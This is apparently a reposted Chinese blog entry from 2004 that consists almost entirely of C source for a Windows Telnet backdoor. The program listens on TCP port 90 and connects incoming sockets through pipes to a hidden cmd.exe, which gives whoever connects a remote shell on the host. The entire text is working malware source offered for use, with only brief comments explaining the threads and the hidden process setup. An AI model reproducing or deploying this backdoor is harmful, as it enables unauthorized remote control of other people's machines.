一个Telnet后门程序(转)

/****************************************************
 created  : 2004/10/09
 created  : 9:10:2004   9:37
 file base : tini
 file ext : c
 author  : XueFeng
 
 purpose  : telnet backdoor
****************************************************/

#include <stdio.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "kernel32.lib")

#define PORT 90
SOCKET ServerSocket = INVALID_SOCKET;
SOCKET ClientSocket = INVALID_SOCKET;
HANDLE hReadPipe, hWritePipe, hWriteFile, hReadFile;
unsigned char varA,varB;

//接收Telnet客户端信息
DWORD WINAPI ThreadFuncA(LPVOID lpParam)
{
    SECURITY_ATTRIBUTES pipeattr;
    DWORD nByteToWrite, nByteWritten;
    char recv_buff[1024];
 
    pipeattr.nLength = sizeof(SECURITY_ATTRIBUTES);
    pipeattr.lpSecurityDescriptor = NULL;
    pipeattr.bInheritHandle = TRUE;
 //创建管道
    CreatePipe(&hReadPipe, &hWriteFile, &pipeattr, 0);
    varA = 1;
    while(TRUE)
    {
        Sleep(250);
        nByteToWrite = recv(ClientSocket, recv_buff, 1024, 0);
        WriteFile(hWriteFile, recv_buff, nByteToWrite, &nByteWritten, NULL);
    }
    return 0;
}

//将命令的执行结果发往Telnet客户端
DWORD WINAPI ThreadFuncB(LPVOID lpParam)
{
    SECURITY_ATTRIBUTES pipeattr;
    DWORD len;
    char send_buff[25000];

    pipeattr.nLength = sizeof(SECURITY_ATTRIBUTES);
    pipeattr.lpSecurityDescriptor = NULL;
    pipeattr.bInheritHandle = TRUE;
    CreatePipe(&hReadFile, &hWritePipe, &pipeattr, 0);
    varB = 1;
    while (TRUE)
    {
        ReadFile(hReadFile, send_buff, 25000, &len, NULL);
        send(ClientSocket, send_buff, len, 0);
    }
    return 0;
}
void main(void)
{
    WSADATA WSAData;
    struct sockaddr_in RemoteAddr;
    DWORD dwThreadIdA, dwThreadIdB, dwThreadParam=0;
    OSVERSIONINFO osvi;
    PROCESS_INFORMATION processinfo;
    STARTUPINFO startinfo;
 char szAPP[256];

 //创建Telnet服务，监听等待客户端连接
    WSAStartup(MAKEWORD(2,2), &WSAData);
    ServerSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    RemoteAddr.sin_family = AF_INET;
    RemoteAddr.sin_port = htons(PORT);
    RemoteAddr.sin_addr.S_un.S_addr = htonl(INADDR_ANY);
    bind(ServerSocket, (LPSOCKADDR)&RemoteAddr, sizeof(RemoteAddr));
    listen(ServerSocket, 5);
    varA = 0;
    varB = 0;
    CreateThread(NULL, 0, ThreadFuncA, NULL, 0, &dwThreadIdA);
    CreateThread(NULL, 0, ThreadFuncB, NULL, 0, &dwThreadIdB);
    do
 {
  Sleep(250);
    } while((varA || varB) == 0);
    GetStartupInfo(&startinfo);
 //设置后台进程属性
    startinfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    startinfo.hStdInput = hReadPipe;
    startinfo.hStdError = hWritePipe;
    startinfo.hStdOutput = hWritePipe;
    startinfo.wShowWindow = SW_HIDE;
    osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    GetVersionEx(&osvi);
    GetSystemDirectory(szAPP, MAX_PATH + 1);
    if (osvi.dwPlatformId == 2)
    {
        strcat(szAPP, "//cmd.exe");
        if (CreateProcess(szAPP, NULL, NULL, NULL, TRUE, 0, NULL, NULL, &startinfo,
   &processinfo) == 0)
        {
            printf ("Create Process Error!/n");
            return;
        }
    }
    else
    {
        strcat(szAPP, "//command.exe");
        CreateProcess(NULL, szAPP, 0, 0, TRUE, 0, 0, 0, &startinfo, &processinfo);
    }
    while (TRUE)
    {
  ClientSocket = accept(ServerSocket, NULL, NULL);
        Sleep(250);
    }
}